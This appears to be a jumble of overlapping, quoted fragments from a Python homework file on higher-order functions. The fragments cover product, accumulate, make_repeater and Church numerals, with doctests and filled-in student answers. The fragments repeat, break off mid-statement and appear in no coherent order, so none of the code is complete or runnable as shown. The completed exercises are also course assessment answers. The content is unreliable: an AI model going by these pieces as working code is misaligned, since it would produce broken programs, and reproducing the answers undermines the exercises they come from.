three)) 6 >>>", "h(g(x)).\"\"\" def f(x): return h(g(x)) return f def make_repeater(h, n):", ">>> product(3, increment) # (1+1) * (2+1) * (3+1) 24", "return f def make_repeater(h, n): \"\"\"Return the function that computes", ">>> accumulate(add, 11, 0, identity) # 11 11 >>> accumulate(add,", "* 3^2 72 >>> accumulate(lambda x, y: x + y", "# 1*3 * 2*3 * 3*3 162 \"\"\" \"*** YOUR", "Church numerals m and n. >>> church_to_int(add_church(two, three)) 5 \"\"\"", "1^2 * 2^2 * 3^2 * 4^2 * 5^2 14400", "<= n: result,k = f(k)*result, k + 1 return result", "successor(two) def church_to_int(n): \"\"\"Convert the Church numeral n to a", "base,1 while k <= n: result, k = combiner(result,f(k)), k", "term >>> product(3, identity) # 1 * 2 * 3", "+ 2^2 + 3^2 25 >>> accumulate(mul, 2, 3, square)", ">>> product_using_accumulate(6, triple) 524880 >>> from construct_check import check >>>", "return lambda f: m(n(f)) def pow_church(m, n): \"\"\"Return the Church", "3^2 25 >>> accumulate(mul, 2, 3, square) # 2 *", "True \"\"\" \"*** YOUR CODE HERE ***\" # result, k", "def successor(n): return lambda f: lambda x: f(n(f)(x)) def one(f):", "11 + 1 + 2 + 3 + 4 +", "n, for Church numerals m and n. >>> church_to_int(add_church(two, three))", "HERE ***\" return lambda x: f(x) def two(f): \"\"\"Church numeral", "numerals m and n. >>> four = successor(three) >>> church_to_int(mul_church(two,", "k <= n: # result, k = result + f(k),", "function that computes the nth application of h. >>> add_three", "and recursion >>> check(HW_SOURCE_FILE, 'product_using_accumulate', ... ['Recursion', 'For', 'While']) True", "3 * 3 * 3 * 1 243 >>> make_repeater(square,", "return lambda x: f(x) def two(f): \"\"\"Church numeral 2: same", "= f(k)*result, k + 1 return result def accumulate(combiner, base,", "m(n(f)) def pow_church(m, n): \"\"\"Return the Church numeral m **", "def one(f): \"\"\"Church numeral 1: same as successor(zero)\"\"\" \"*** YOUR", "the term >>> product(3, identity) # 1 * 2 *", "36 >>> product(5, square) # 1^2 * 2^2 * 3^2", "n, f): \"\"\"Return the result of combining the first n", "11, 3, square) # 11 + 1^2 + 2^2 +", "m and n. >>> church_to_int(pow_church(two, three)) 8 >>> church_to_int(pow_church(three, two))", "a sequence. n -- a positive integer f -- a", "k = combiner(result,f(k)), k + 1 return result def summation_using_accumulate(n,", "# 11 + 1 + 2 + 3 + 4", ">>> # ban iteration and recursion >>> check(HW_SOURCE_FILE, 'summation_using_accumulate', ...", "lambda f: m(n(f)) def pow_church(m, n): \"\"\"Return the Church numeral", "one argument to produce the term >>> product(3, identity) #", "55 >>> summation_using_accumulate(5, triple) 45 >>> from construct_check import check", "lambda x: x def successor(n): return lambda f: lambda x:", "n: result, k = combiner(result,f(k)), k + 1 return result", "\"\"\" \"*** YOUR CODE HERE ***\" result,k = 1,1 while", "YOUR CODE HERE ***\" def repeater(x): result, k = x,1", "# result, k = 1, 1 # while k <=", "x: x + 1)(0) def add_church(m, n): \"\"\"Return the Church", "1 >>> church_to_int(two) 2 >>> church_to_int(three) 3 \"\"\" \"*** YOUR", "as successor(successor(zero))\"\"\" \"*** YOUR CODE HERE ***\" return lambda x:", "recursion >>> check(HW_SOURCE_FILE, 'product_using_accumulate', ... ['Recursion', 'For', 'While']) True \"\"\"", "church_to_int(one) 1 >>> church_to_int(two) 2 >>> church_to_int(three) 3 \"\"\" \"***", "Church numeral for m * n, for Church numerals m", "return lambda x: x def successor(n): return lambda f: lambda", "f, such that f(x) = h(g(x)).\"\"\" def f(x): return h(g(x))", "16 \"\"\" \"*** YOUR CODE HERE ***\" result, k =", "* 3 * 3 * 3 * 1 243 >>>", "-- a positive integer f -- a function that takes", "the first n terms in a sequence and base. The", "HERE ***\" # result, k = 1, 1 # while", "h(g(x)) return f def make_repeater(h, n): \"\"\"Return the function that", "return n(lambda x: x + 1)(0) def add_church(m, n): \"\"\"Return", "\"\"\" \"*** YOUR CODE HERE ***\" return n(lambda x: x", "ban iteration and recursion >>> check(HW_SOURCE_FILE, 'product_using_accumulate', ... ['Recursion', 'For',", "Questions # ########################## def zero(f): return lambda x: x def", "two(f): \"\"\"Church numeral 2: same as successor(successor(zero))\"\"\" \"*** YOUR CODE", "increment) # (1+1) * (2+1) * (3+1) 24 >>> product(3,", "numeral for m + n, for Church numerals m and", "while k <= n: # result, k = result +", "***\" return lambda f: m(n(f)) def pow_church(m, n): \"\"\"Return the", "takes one argument to produce the term >>> product(3, identity)", "\"\"\"Return the product of the first n terms in a", "= 1, 1 # while k <= n: # result,", "5, identity) # 11 + 1 + 2 + 3", "f): \"\"\"Return the result of combining the first n terms", "a function f, such that f(x) = h(g(x)).\"\"\" def f(x):", "= combiner(result,f(k)), k + 1 return result def summation_using_accumulate(n, f):", "CODE HERE ***\" return lambda x: f(f(x)) three = successor(two)", "x increment = lambda x: x + 1 ###################### #", ">>> make_repeater(square, 4)(5) # square(square(square(square(5)))) 152587890625 >>> make_repeater(square, 0)(5) #", "numeral 2: same as successor(successor(zero))\"\"\" \"*** YOUR CODE HERE ***\"", "numerals m and n. >>> church_to_int(pow_church(two, three)) 8 >>> church_to_int(pow_church(three,", "nth application of h. >>> add_three = make_repeater(increment, 3) >>>", "first n terms in a sequence. n -- a positive", "* 5 120 >>> product(3, square) # 1^2 * 2^2", "identity) # 1 * 2 * 3 6 >>> product(5,", "11 11 >>> accumulate(add, 11, 3, square) # 11 +", "= x,1 while k <= n: result,k = h(result), k", "5 120 >>> product(3, square) # 1^2 * 2^2 *", "5, identity) # 0 + 1 + 2 + 3", "return accumulate(mul,1,n,f) def compose1(h, g): \"\"\"Return a function f, such", "n(lambda x: x + 1)(0) def add_church(m, n): \"\"\"Return the", "\"\"\" \"*** YOUR CODE HERE ***\" # result, k =", ">>> church_to_int(two) 2 >>> church_to_int(three) 3 \"\"\" \"*** YOUR CODE", "+ 1 return result def summation_using_accumulate(n, f): \"\"\"Returns the sum", "11, 0, identity) # 11 11 >>> accumulate(add, 11, 3,", "f(n(f)(x)) def one(f): \"\"\"Church numeral 1: same as successor(zero)\"\"\" \"***", "1^2 * 2^2 * 3^2 72 >>> accumulate(lambda x, y:", "+ n, for Church numerals m and n. >>> church_to_int(add_church(two,", "4 + 5 15 >>> accumulate(add, 11, 5, identity) #", "make_repeater(h, n): \"\"\"Return the function that computes the nth application", "church_to_int(mul_church(three, four)) 12 \"\"\" \"*** YOUR CODE HERE ***\" return", "lambda x: x triple = lambda x: 3 * x", "f -- a function that takes one argument to produce", "14400 >>> product(3, increment) # (1+1) * (2+1) * (3+1)", "combining the first n terms in a sequence and base.", "a sequence and base. The terms to be combined are", "f def make_repeater(h, n): \"\"\"Return the function that computes the", "product(3, square) # 1^2 * 2^2 * 3^2 36 >>>", ">>> make_repeater(triple, 5)(1) # 3 * 3 * 3 *", "45 >>> from construct_check import check >>> # ban iteration", "2^2 * 3^2 36 >>> product(5, square) # 1^2 *", ">>> from construct_check import check >>> # ban iteration and", "\"*** YOUR CODE HERE ***\" # result, k = 1,", "2 * 3 * 4 * 5 120 >>> product(3,", "successor(three) >>> church_to_int(mul_church(two, three)) 6 >>> church_to_int(mul_church(three, four)) 12 \"\"\"", "k + 1 return accumulate(mul,1,n,f) def compose1(h, g): \"\"\"Return a", "lambda x: f(n(f)(x)) def one(f): \"\"\"Church numeral 1: same as", "\"*** YOUR CODE HERE ***\" result,k = 1,1 while k", "* (2+1) * (3+1) 24 >>> product(3, triple) # 1*3", ">>> # ban iteration and recursion >>> check(HW_SOURCE_FILE, 'product_using_accumulate', ...", "numerals m and n. >>> church_to_int(add_church(two, three)) 5 \"\"\" \"***", "from construct_check import check >>> # ban iteration and recursion", "* f(k), k + 1 return accumulate(mul,1,n,f) def compose1(h, g):", "= lambda x: 3 * x increment = lambda x:", "3 * 3 * 3 * 3 * 3 *", "a two-argument commutative, associative function. >>> accumulate(add, 0, 5, identity)", "summation_using_accumulate(n, f): \"\"\"Returns the sum of f(1) + ... +", "numeral 1: same as successor(zero)\"\"\" \"*** YOUR CODE HERE ***\"", "2^2 + 3^2 25 >>> accumulate(mul, 2, 3, square) #", "result def summation_using_accumulate(n, f): \"\"\"Returns the sum of f(1) +", "result return repeater ########################## # Just for fun Questions #", "\"*** YOUR CODE HERE ***\" # result, k = 0,", "result def accumulate(combiner, base, n, f): \"\"\"Return the result of", "524880 >>> from construct_check import check >>> # ban iteration", "repeater(x): result, k = x,1 while k <= n: result,k", "summation_using_accumulate(5, square) 55 >>> summation_using_accumulate(5, triple) 45 >>> from construct_check", "\"*** YOUR CODE HERE ***\" result, k = base,1 while", "that computes the nth application of h. >>> add_three =", "# square(square(5)) 625 >>> make_repeater(square, 4)(5) # square(square(square(square(5)))) 152587890625 >>>", "12 \"\"\" \"*** YOUR CODE HERE ***\" return lambda f:", "* 3 * 4 * 5 120 >>> product(3, square)", "mul, sub square = lambda x: x * x identity", "CODE HERE ***\" result,k = 1,1 while k <= n:", "* 2^2 * 3^2 * 4^2 * 5^2 14400 >>>", "x * x identity = lambda x: x triple =", "HERE ***\" result, k = base,1 while k <= n:", "<= n: result, k = combiner(result,f(k)), k + 1 return", "f(n). The implementation uses accumulate. >>> summation_using_accumulate(5, square) 55 >>>", "4 * 5 120 >>> product(3, square) # 1^2 *", "iteration and recursion >>> check(HW_SOURCE_FILE, 'summation_using_accumulate', ... ['Recursion', 'For', 'While'])", "combiner is a two-argument commutative, associative function. >>> accumulate(add, 0,", "lambda x: 3 * x increment = lambda x: x", "n: # result, k = result + f(k), k +", "lambda x: f(f(x)) three = successor(two) def church_to_int(n): \"\"\"Convert the", "product(5, square) # 1^2 * 2^2 * 3^2 * 4^2", ">>> accumulate(add, 11, 3, square) # 11 + 1^2 +", "8 >>> make_repeater(triple, 5)(1) # 3 * 3 * 3", "lambda x: m(f)(n(f)(x)) def mul_church(m, n): \"\"\"Return the Church numeral", "= 1,1 while k <= n: result,k = f(k)*result, k", "152587890625 >>> make_repeater(square, 0)(5) # Yes, it makes sense to", "\"*** YOUR CODE HERE ***\" return lambda x: f(f(x)) three", "2, 3, square) # 2 * 1^2 * 2^2 *", "+ 1 return accumulate(add,0,n,f) def product_using_accumulate(n, f): \"\"\"An implementation of", "+ 1 + 2 + 3 + 4 + 5", "f(x): return h(g(x)) return f def make_repeater(h, n): \"\"\"Return the", ">>> accumulate(lambda x, y: x + y + 1, 2,", "a function that takes one argument to produce the term", "0)(5) # Yes, it makes sense to apply the function", "produce the term >>> product(3, identity) # 1 * 2", "square) # 2 * 1^2 * 2^2 * 3^2 72", "summation_using_accumulate(5, triple) 45 >>> from construct_check import check >>> #", "\"\"\" \"*** YOUR CODE HERE ***\" return lambda f: lambda", "make_repeater(square, 4)(5) # square(square(square(square(5)))) 152587890625 >>> make_repeater(square, 0)(5) # Yes,", "the Church numeral for m + n, for Church numerals", ">>> product(3, triple) # 1*3 * 2*3 * 3*3 162", "# square(square(square(square(5)))) 152587890625 >>> make_repeater(square, 0)(5) # Yes, it makes", "be combined are f(1), f(2), ..., f(n). combiner is a", "result,k = h(result), k + 1 return result return repeater", "# 11 + 1^2 + 2^2 + 3^2 25 >>>", "return result def accumulate(combiner, base, n, f): \"\"\"Return the result", "YOUR CODE HERE ***\" return lambda f: m(n(f)) def pow_church(m,", "three = successor(two) def church_to_int(n): \"\"\"Convert the Church numeral n", ">>> summation_using_accumulate(5, triple) 45 >>> from construct_check import check >>>", "check >>> # ban iteration and recursion >>> check(HW_SOURCE_FILE, 'summation_using_accumulate',", "while k <= n: result,k = h(result), k + 1", "implementation uses accumulate. >>> summation_using_accumulate(5, square) 55 >>> summation_using_accumulate(5, triple)", "# 1 * 2 * 3 6 >>> product(5, identity)", "m + n, for Church numerals m and n. >>>", "* 5^2 14400 >>> product(3, increment) # (1+1) * (2+1)", "\"*** YOUR CODE HERE ***\" return n(lambda x: x +", "k <= n: result, k = combiner(result,f(k)), k + 1", "+ 1 return result return repeater ########################## # Just for", "... ['Recursion', 'For', 'While']) True \"\"\" \"*** YOUR CODE HERE", "8 >>> church_to_int(pow_church(three, two)) 9 \"\"\" \"*** YOUR CODE HERE", "***\" result,k = 1,1 while k <= n: result,k =", "three)) 8 >>> church_to_int(pow_church(three, two)) 9 \"\"\" \"*** YOUR CODE", "1 return accumulate(add,0,n,f) def product_using_accumulate(n, f): \"\"\"An implementation of product", "church_to_int(pow_church(two, three)) 8 >>> church_to_int(pow_church(three, two)) 9 \"\"\" \"*** YOUR", "k = 0, 1 # while k <= n: #", "def church_to_int(n): \"\"\"Convert the Church numeral n to a Python", "5 \"\"\" \"*** YOUR CODE HERE ***\" def repeater(x): result,", ">>> church_to_int(three) 3 \"\"\" \"*** YOUR CODE HERE ***\" return", ">>> church_to_int(mul_church(two, three)) 6 >>> church_to_int(mul_church(three, four)) 12 \"\"\" \"***", "check >>> # ban iteration and recursion >>> check(HW_SOURCE_FILE, 'product_using_accumulate',", "CODE HERE ***\" result, k = base,1 while k <=", "result, k = result * f(k), k + 1 return", "positive integer f -- a function that takes one argument", "x: x triple = lambda x: 3 * x increment", "computes the nth application of h. >>> add_three = make_repeater(increment,", "+ 1 ###################### # Required Questions # ###################### def product(n,", "def accumulate(combiner, base, n, f): \"\"\"Return the result of combining", ">>> check(HW_SOURCE_FILE, 'summation_using_accumulate', ... ['Recursion', 'For', 'While']) True \"\"\" \"***", "\"\"\"Return the Church numeral m ** n, for Church numerals", "Higher Order Functions\"\"\" HW_SOURCE_FILE = 'hw02.py' from operator import add,", "x def successor(n): return lambda f: lambda x: f(n(f)(x)) def", "sub square = lambda x: x * x identity =", "f(n). combiner is a two-argument commutative, associative function. >>> accumulate(add,", "sense to apply the function zero times! 5 \"\"\" \"***", "lambda x: f(x) def two(f): \"\"\"Church numeral 2: same as", "terms in a sequence. n -- a positive integer f", "# Just for fun Questions # ########################## def zero(f): return", "11, 5, identity) # 11 + 1 + 2 +", "return result def summation_using_accumulate(n, f): \"\"\"Returns the sum of f(1)", "apply the function zero times! 5 \"\"\" \"*** YOUR CODE", "product_using_accumulate(6, triple) 524880 >>> from construct_check import check >>> #", "4^2 * 5^2 14400 >>> product(3, increment) # (1+1) *", "construct_check import check >>> # ban iteration and recursion >>>", "\"\"\" \"*** YOUR CODE HERE ***\" def repeater(x): result, k", "1, 2, 3, square) 19 >>> accumulate(lambda x, y: 2", "1: same as successor(zero)\"\"\" \"*** YOUR CODE HERE ***\" return", "church_to_int(three) 3 \"\"\" \"*** YOUR CODE HERE ***\" return n(lambda", "..., f(n). combiner is a two-argument commutative, associative function. >>>", "y: x + y + 1, 2, 3, square) 19", "HERE ***\" return lambda x: f(f(x)) three = successor(two) def", "result, k = 0, 1 # while k <= n:", "HERE ***\" def repeater(x): result, k = x,1 while k", "+ 5 15 >>> accumulate(add, 11, 5, identity) # 11", "+ f(k), k + 1 return accumulate(add,0,n,f) def product_using_accumulate(n, f):", "1 return result return repeater ########################## # Just for fun", "product(3, identity) # 1 * 2 * 3 6 >>>", "3 * 4 * 5 120 >>> product(3, square) #", "Order Functions\"\"\" HW_SOURCE_FILE = 'hw02.py' from operator import add, mul,", "a Python integer. >>> church_to_int(zero) 0 >>> church_to_int(one) 1 >>>", "numeral m ** n, for Church numerals m and n.", "sum of f(1) + ... + f(n). The implementation uses", ">>> product(5, identity) # 1 * 2 * 3 *", "identity) # 11 + 1 + 2 + 3 +", "# result, k = 0, 1 # while k <=", "* (3+1) 24 >>> product(3, triple) # 1*3 * 2*3", "= successor(three) >>> church_to_int(mul_church(two, three)) 6 >>> church_to_int(mul_church(three, four)) 12", "# ban iteration and recursion >>> check(HW_SOURCE_FILE, 'product_using_accumulate', ... ['Recursion',", "two)) 9 \"\"\" \"*** YOUR CODE HERE ***\" return n(m)", "# ban iteration and recursion >>> check(HW_SOURCE_FILE, 'summation_using_accumulate', ... ['Recursion',", "1 + 2 + 3 + 4 + 5 26", "n: result,k = h(result), k + 1 return result return", "it makes sense to apply the function zero times! 5", "n -- a positive integer f -- a function that", "y + 1, 2, 3, square) 19 >>> accumulate(lambda x,", "three)) 6 >>> church_to_int(mul_church(three, four)) 12 \"\"\" \"*** YOUR CODE", "m and n. >>> four = successor(three) >>> church_to_int(mul_church(two, three))", "+ ... + f(n). The implementation uses accumulate. >>> summation_using_accumulate(5,", "zero(f): return lambda x: x def successor(n): return lambda f:", "'product_using_accumulate', ... ['Recursion', 'For', 'While']) True \"\"\" \"*** YOUR CODE", "HERE ***\" result,k = 1,1 while k <= n: result,k", "square = lambda x: x * x identity = lambda", "+ 1 return result def accumulate(combiner, base, n, f): \"\"\"Return", "m * n, for Church numerals m and n. >>>", "result, k = result + f(k), k + 1 return", "= lambda x: x * x identity = lambda x:", "k + 1 return result def accumulate(combiner, base, n, f):", "the product of the first n terms in a sequence.", "terms to be combined are f(1), f(2), ..., f(n). combiner", "2, 3, square) 19 >>> accumulate(lambda x, y: 2 *", "# 2 * 1^2 * 2^2 * 3^2 72 >>>", "# 1^2 * 2^2 * 3^2 * 4^2 * 5^2", "3, square) 19 >>> accumulate(lambda x, y: 2 * (x", "Church numerals m and n. >>> church_to_int(pow_church(two, three)) 8 >>>", "church_to_int(zero) 0 >>> church_to_int(one) 1 >>> church_to_int(two) 2 >>> church_to_int(three)", "1 * 2 * 3 * 4 * 5 120", "f(1), f(2), ..., f(n). combiner is a two-argument commutative, associative", "accumulate(add,0,n,f) def product_using_accumulate(n, f): \"\"\"An implementation of product using accumulate.", "f(k), k + 1 return accumulate(mul,1,n,f) def compose1(h, g): \"\"\"Return", "square(square(5)) 625 >>> make_repeater(square, 4)(5) # square(square(square(square(5)))) 152587890625 >>> make_repeater(square,", "HW_SOURCE_FILE = 'hw02.py' from operator import add, mul, sub square", "= h(result), k + 1 return result return repeater ##########################", "integer. >>> church_to_int(zero) 0 >>> church_to_int(one) 1 >>> church_to_int(two) 2", "3 * x increment = lambda x: x + 1", "x: x * x identity = lambda x: x triple", "def pow_church(m, n): \"\"\"Return the Church numeral m ** n,", "the Church numeral n to a Python integer. >>> church_to_int(zero)", "['Recursion', 'For', 'While']) True \"\"\" \"*** YOUR CODE HERE ***\"", "makes sense to apply the function zero times! 5 \"\"\"", ">>> church_to_int(pow_church(two, three)) 8 >>> church_to_int(pow_church(three, two)) 9 \"\"\" \"***", "of product using accumulate. >>> product_using_accumulate(4, square) 576 >>> product_using_accumulate(6,", "HERE ***\" return lambda f: lambda x: m(f)(n(f)(x)) def mul_church(m,", "# result, k = result * f(k), k + 1", "product_using_accumulate(4, square) 576 >>> product_using_accumulate(6, triple) 524880 >>> from construct_check", "the Church numeral m ** n, for Church numerals m", "return lambda x: f(f(x)) three = successor(two) def church_to_int(n): \"\"\"Convert", "def mul_church(m, n): \"\"\"Return the Church numeral for m *", ">>> product(5, square) # 1^2 * 2^2 * 3^2 *", "from operator import add, mul, sub square = lambda x:", "CODE HERE ***\" return lambda x: f(x) def two(f): \"\"\"Church", "(x + y), 2, 3, square) 58 >>> accumulate(lambda x,", "two-argument commutative, associative function. >>> accumulate(add, 0, 5, identity) #", "162 \"\"\" \"*** YOUR CODE HERE ***\" result,k = 1,1", "for m * n, for Church numerals m and n.", "<= n: # result, k = result + f(k), k", "\"\"\" \"*** YOUR CODE HERE ***\" return lambda f: m(n(f))", "result, k = combiner(result,f(k)), k + 1 return result def", "operator import add, mul, sub square = lambda x: x", "add, mul, sub square = lambda x: x * x", "square) # 11 + 1^2 + 2^2 + 3^2 25", "3 * 1 243 >>> make_repeater(square, 2)(5) # square(square(5)) 625", "k = x,1 while k <= n: result,k = h(result),", "YOUR CODE HERE ***\" return n(lambda x: x + 1)(0)", "+ 3 + 4 + 5 15 >>> accumulate(add, 11,", "x: x + 1 ###################### # Required Questions # ######################", "square(square(square(square(5)))) 152587890625 >>> make_repeater(square, 0)(5) # Yes, it makes sense", "of h. >>> add_three = make_repeater(increment, 3) >>> add_three(5) 8", "n terms in a sequence. n -- a positive integer", "def zero(f): return lambda x: x def successor(n): return lambda", "while k <= n: result,k = f(k)*result, k + 1", "+ 3 + 4 + 5 26 >>> accumulate(add, 11,", "while k <= n: result, k = combiner(result,f(k)), k +", "3 * 3 * 3 * 3 * 1 243", "HERE ***\" return n(lambda x: x + 1)(0) def add_church(m,", "one(f): \"\"\"Church numeral 1: same as successor(zero)\"\"\" \"*** YOUR CODE", "h(result), k + 1 return result return repeater ########################## #", "product using accumulate. >>> product_using_accumulate(4, square) 576 >>> product_using_accumulate(6, triple)", "accumulate(add, 11, 0, identity) # 11 11 >>> accumulate(add, 11,", "* 1^2 * 2^2 * 3^2 72 >>> accumulate(lambda x,", "***\" return n(lambda x: x + 1)(0) def add_church(m, n):", "while k <= n: # result, k = result *", "* (x + y), 2, 3, square) 58 >>> accumulate(lambda", "1 + 2 + 3 + 4 + 5 15", "that takes one argument to produce the term >>> product(3,", "identity) # 11 11 >>> accumulate(add, 11, 3, square) #", "product(3, increment) # (1+1) * (2+1) * (3+1) 24 >>>", "result,k = 1,1 while k <= n: result,k = f(k)*result,", "* 2^2 * 3^2 72 >>> accumulate(lambda x, y: x", "argument to produce the term >>> product(3, identity) # 1", "f(k)*result, k + 1 return result def accumulate(combiner, base, n,", "YOUR CODE HERE ***\" result, k = base,1 while k", "(2+1) * (3+1) 24 >>> product(3, triple) # 1*3 *", "'summation_using_accumulate', ... ['Recursion', 'For', 'While']) True \"\"\" \"*** YOUR CODE", "iteration and recursion >>> check(HW_SOURCE_FILE, 'product_using_accumulate', ... ['Recursion', 'For', 'While'])", ">>> product_using_accumulate(4, square) 576 >>> product_using_accumulate(6, triple) 524880 >>> from", "\"\"\"Return the Church numeral for m + n, for Church", "YOUR CODE HERE ***\" return lambda f: lambda x: m(f)(n(f)(x))", "= base,1 while k <= n: result, k = combiner(result,f(k)),", "* 3 * 3 * 1 243 >>> make_repeater(square, 2)(5)", "0 + 1 + 2 + 3 + 4 +", "# ###################### def product(n, f): \"\"\"Return the product of the", "square) # 1^2 * 2^2 * 3^2 * 4^2 *", "return accumulate(add,0,n,f) def product_using_accumulate(n, f): \"\"\"An implementation of product using", "243 >>> make_repeater(square, 2)(5) # square(square(5)) 625 >>> make_repeater(square, 4)(5)", "numeral n to a Python integer. >>> church_to_int(zero) 0 >>>", ">>> accumulate(add, 0, 5, identity) # 0 + 1 +", "72 >>> accumulate(lambda x, y: x + y + 1,", ">>> accumulate(lambda x, y: 2 * (x + y), 2,", "function f, such that f(x) = h(g(x)).\"\"\" def f(x): return", "f(1) + ... + f(n). The implementation uses accumulate. >>>", "import check >>> # ban iteration and recursion >>> check(HW_SOURCE_FILE,", "y), 2, 3, square) 58 >>> accumulate(lambda x, y: (x", "sequence and base. The terms to be combined are f(1),", "* 2 * 3 * 4 * 5 120 >>>", "accumulate(combiner, base, n, f): \"\"\"Return the result of combining the", "+ 4 + 5 26 >>> accumulate(add, 11, 0, identity)", "# while k <= n: # result, k = result", "1 243 >>> make_repeater(square, 2)(5) # square(square(5)) 625 >>> make_repeater(square,", "n): \"\"\"Return the function that computes the nth application of", "x: 3 * x increment = lambda x: x +", "identity) # 1 * 2 * 3 * 4 *", "+ 1 return accumulate(mul,1,n,f) def compose1(h, g): \"\"\"Return a function", "x: x def successor(n): return lambda f: lambda x: f(n(f)(x))", "CODE HERE ***\" return lambda f: lambda x: m(f)(n(f)(x)) def", "= 'hw02.py' from operator import add, mul, sub square =", "n, for Church numerals m and n. >>> four =", "f(2), ..., f(n). combiner is a two-argument commutative, associative function.", "2 * 3 6 >>> product(5, identity) # 1 *", ">>> church_to_int(zero) 0 >>> church_to_int(one) 1 >>> church_to_int(two) 2 >>>", "HERE ***\" return lambda f: m(n(f)) def pow_church(m, n): \"\"\"Return", "square) 16 \"\"\" \"*** YOUR CODE HERE ***\" result, k", "base. The terms to be combined are f(1), f(2), ...,", "accumulate(add, 11, 3, square) # 11 + 1^2 + 2^2", "associative function. >>> accumulate(add, 0, 5, identity) # 0 +", "combiner(result,f(k)), k + 1 return result def summation_using_accumulate(n, f): \"\"\"Returns", "= h(g(x)).\"\"\" def f(x): return h(g(x)) return f def make_repeater(h,", "Church numeral n to a Python integer. >>> church_to_int(zero) 0", "accumulate(add, 0, 5, identity) # 0 + 1 + 2", "n. >>> church_to_int(pow_church(two, three)) 8 >>> church_to_int(pow_church(three, two)) 9 \"\"\"", "Church numeral for m + n, for Church numerals m", "the Church numeral for m * n, for Church numerals", "uses accumulate. >>> summation_using_accumulate(5, square) 55 >>> summation_using_accumulate(5, triple) 45", "square) 19 >>> accumulate(lambda x, y: 2 * (x +", "5)(1) # 3 * 3 * 3 * 3 *", "+ 2 + 3 + 4 + 5 26 >>>", "four = successor(three) >>> church_to_int(mul_church(two, three)) 6 >>> church_to_int(mul_church(three, four))", "of f(1) + ... + f(n). The implementation uses accumulate.", "***\" # result, k = 0, 1 # while k", "* x increment = lambda x: x + 1 ######################", "3 * 3 * 1 243 >>> make_repeater(square, 2)(5) #", "* x identity = lambda x: x triple = lambda", "'While']) True \"\"\" \"*** YOUR CODE HERE ***\" # result,", "x,1 while k <= n: result,k = h(result), k +", "the result of combining the first n terms in a", "add_three = make_repeater(increment, 3) >>> add_three(5) 8 >>> make_repeater(triple, 5)(1)", "(1+1) * (2+1) * (3+1) 24 >>> product(3, triple) #", "def make_repeater(h, n): \"\"\"Return the function that computes the nth", "3*3 162 \"\"\" \"*** YOUR CODE HERE ***\" result,k =", "1^2 + 2^2 + 3^2 25 >>> accumulate(mul, 2, 3,", "# result, k = result + f(k), k + 1", "f): \"\"\"Returns the sum of f(1) + ... + f(n).", "1 return accumulate(mul,1,n,f) def compose1(h, g): \"\"\"Return a function f,", "2 * (x + y), 2, 3, square) 58 >>>", "* 2 * 3 6 >>> product(5, identity) # 1", "triple) 524880 >>> from construct_check import check >>> # ban", "24 >>> product(3, triple) # 1*3 * 2*3 * 3*3", "5 \"\"\" \"*** YOUR CODE HERE ***\" return lambda f:", "# 1 * 2 * 3 * 4 * 5", "+ y), 2, 3, square) 58 >>> accumulate(lambda x, y:", "x + 1)(0) def add_church(m, n): \"\"\"Return the Church numeral", "same as successor(zero)\"\"\" \"*** YOUR CODE HERE ***\" return lambda", "m ** n, for Church numerals m and n. >>>", "1,1 while k <= n: result,k = f(k)*result, k +", "1 return result def accumulate(combiner, base, n, f): \"\"\"Return the", "n): \"\"\"Return the Church numeral m ** n, for Church", "accumulate. >>> summation_using_accumulate(5, square) 55 >>> summation_using_accumulate(5, triple) 45 >>>", "for Church numerals m and n. >>> church_to_int(pow_church(two, three)) 8", "6 >>> product(5, identity) # 1 * 2 * 3", "implementation of product using accumulate. >>> product_using_accumulate(4, square) 576 >>>", "20, square) 16 \"\"\" \"*** YOUR CODE HERE ***\" result,", "successor(n): return lambda f: lambda x: f(n(f)(x)) def one(f): \"\"\"Church", "church_to_int(n): \"\"\"Convert the Church numeral n to a Python integer.", "fun Questions # ########################## def zero(f): return lambda x: x", "\"*** YOUR CODE HERE ***\" return lambda x: f(x) def", "accumulate. >>> product_using_accumulate(4, square) 576 >>> product_using_accumulate(6, triple) 524880 >>>", "result of combining the first n terms in a sequence", "are f(1), f(2), ..., f(n). combiner is a two-argument commutative,", "def product(n, f): \"\"\"Return the product of the first n", "of combining the first n terms in a sequence and", "x triple = lambda x: 3 * x increment =", "square) 55 >>> summation_using_accumulate(5, triple) 45 >>> from construct_check import", "3) >>> add_three(5) 8 >>> make_repeater(triple, 5)(1) # 3 *", "Yes, it makes sense to apply the function zero times!", "function zero times! 5 \"\"\" \"*** YOUR CODE HERE ***\"", "def summation_using_accumulate(n, f): \"\"\"Returns the sum of f(1) + ...", "* 2^2 * 3^2 36 >>> product(5, square) # 1^2", "\"\"\"Church numeral 1: same as successor(zero)\"\"\" \"*** YOUR CODE HERE", "product of the first n terms in a sequence. n", "0, identity) # 11 11 >>> accumulate(add, 11, 3, square)", "4 + 5 26 >>> accumulate(add, 11, 0, identity) #", "The implementation uses accumulate. >>> summation_using_accumulate(5, square) 55 >>> summation_using_accumulate(5,", "the function zero times! 5 \"\"\" \"*** YOUR CODE HERE", "5^2 14400 >>> product(3, increment) # (1+1) * (2+1) *", "# 0 + 1 + 2 + 3 + 4", "y: (x + y) % 17, 19, 20, square) 16", "3 \"\"\" \"*** YOUR CODE HERE ***\" return n(lambda x:", "* 4 * 5 120 >>> product(3, square) # 1^2", "square) 58 >>> accumulate(lambda x, y: (x + y) %", "product(5, identity) # 1 * 2 * 3 * 4", "the nth application of h. >>> add_three = make_repeater(increment, 3)", "+ 1^2 + 2^2 + 3^2 25 >>> accumulate(mul, 2,", "1*3 * 2*3 * 3*3 162 \"\"\" \"*** YOUR CODE", "\"\"\"Return the function that computes the nth application of h.", "\"\"\"Return a function f, such that f(x) = h(g(x)).\"\"\" def", "# 1^2 * 2^2 * 3^2 36 >>> product(5, square)", "3, square) # 11 + 1^2 + 2^2 + 3^2", "y) % 17, 19, 20, square) 16 \"\"\" \"*** YOUR", "def repeater(x): result, k = x,1 while k <= n:", "increment = lambda x: x + 1 ###################### # Required", ">>> church_to_int(add_church(two, three)) 5 \"\"\" \"*** YOUR CODE HERE ***\"", ">>> accumulate(lambda x, y: (x + y) % 17, 19,", "triple) # 1*3 * 2*3 * 3*3 162 \"\"\" \"***", "return repeater ########################## # Just for fun Questions # ##########################", "f: m(n(f)) def pow_church(m, n): \"\"\"Return the Church numeral m", "\"*** YOUR CODE HERE ***\" def repeater(x): result, k =", "is a two-argument commutative, associative function. >>> accumulate(add, 0, 5,", "h. >>> add_three = make_repeater(increment, 3) >>> add_three(5) 8 >>>", "make_repeater(square, 0)(5) # Yes, it makes sense to apply the", "* 2*3 * 3*3 162 \"\"\" \"*** YOUR CODE HERE", "= make_repeater(increment, 3) >>> 